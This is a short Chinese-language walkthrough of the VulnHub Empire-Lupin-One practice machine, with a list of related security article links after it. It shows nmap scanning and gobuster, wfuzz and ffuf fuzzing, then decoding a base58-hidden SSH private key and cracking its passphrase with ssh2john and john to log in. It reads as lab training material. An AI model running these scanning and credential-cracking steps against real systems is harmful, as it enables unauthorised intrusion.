vulnhub Empire-Lupin-One靶机

搭建靶机;拖进来就行

扫描靶机IP

复制代码
nmap -O 192.168.47.130

1.信息收集

复制代码
nmap -p- 192.168.47.133
nmap -sC -sV -p 22,80 192.168.47.133 -oN nmap.log

目录扫描

复制代码
gobuster dir -w 字典目录 -u 目标
gobuster dir -w zi.txt -u http://192.168.47.133/

2.寻找薄弱点

查看robots.txt文件,发现一个不可访问的~myfiles文件,下面应该有其他文件,模糊测试下

复制代码
wfuzz -c -w zi.txt -u http://192.168.47.133/~FUZZ | grep -v 404

扫到一个 secret

3.解密

得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64

复制代码
ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

直接去访问一下这个文件mysecret.txt

去解密一下

base64解密不出来;base58可以;这就是登录系统的私钥

创建两个文档;2.txt写我们解密后的数据;1.txt空的

我们可以利用kali自带的ssh2john进行密码的暴力破解

把我们解密后的数据写到1.txt

复制代码
ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!

4.登录系统

复制代码
#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key	#提升权限
dos2unix key	#改变格式
#在连接
ssh [email protected] -i key

成功获取flag

相关推荐
轨迹H2 小时前
【春秋云镜】CVE-2023-2130漏洞复现exp
网络协议·网络安全·渗透测试·ctf·cve
寻丶幽风4 小时前
论文阅读笔记——Muffin: Testing Deep Learning Libraries via Neural Architecture Fuzzing
论文阅读·笔记·深度学习·网络安全·差分测试
炎码工坊5 小时前
API网关Envoy的鉴权与限流:构建安全可靠的微服务网关
网络安全·微服务·云原生·系统安全·安全架构
炎码工坊5 小时前
从零掌握微服务通信安全:mTLS全解析
安全·网络安全·云原生·系统安全·安全架构
炎码工坊6 小时前
API网关Kong的鉴权与限流:高并发场景下的核心实践
安全·网络安全·微服务·云原生·系统安全
炎码工坊6 小时前
云原生安全实战:API网关Kong的鉴权与限流详解
网络安全·微服务·云原生·系统安全·安全架构
炎码工坊7 小时前
云原生安全实战:API网关Envoy的鉴权与限流详解
安全·网络安全·微服务·云原生·系统安全
枷锁—sha7 小时前
【DVWA系列】——xss(Reflected)——Medium详细教程
前端·网络·web安全·网络安全·xss
Johny_Zhao1 天前
2025年6月Docker镜像加速失效终极解决方案
linux·网络·网络安全·docker·信息安全·kubernetes·云计算·containerd·yum源·系统运维
痴人说梦梦中人1 天前
SwaggerFuzzer:一款自动化 OpenAPI/Swagger 接口未授权访问测试工具
网络安全·渗透测试·自动化·api测试·漏洞利用·信息搜集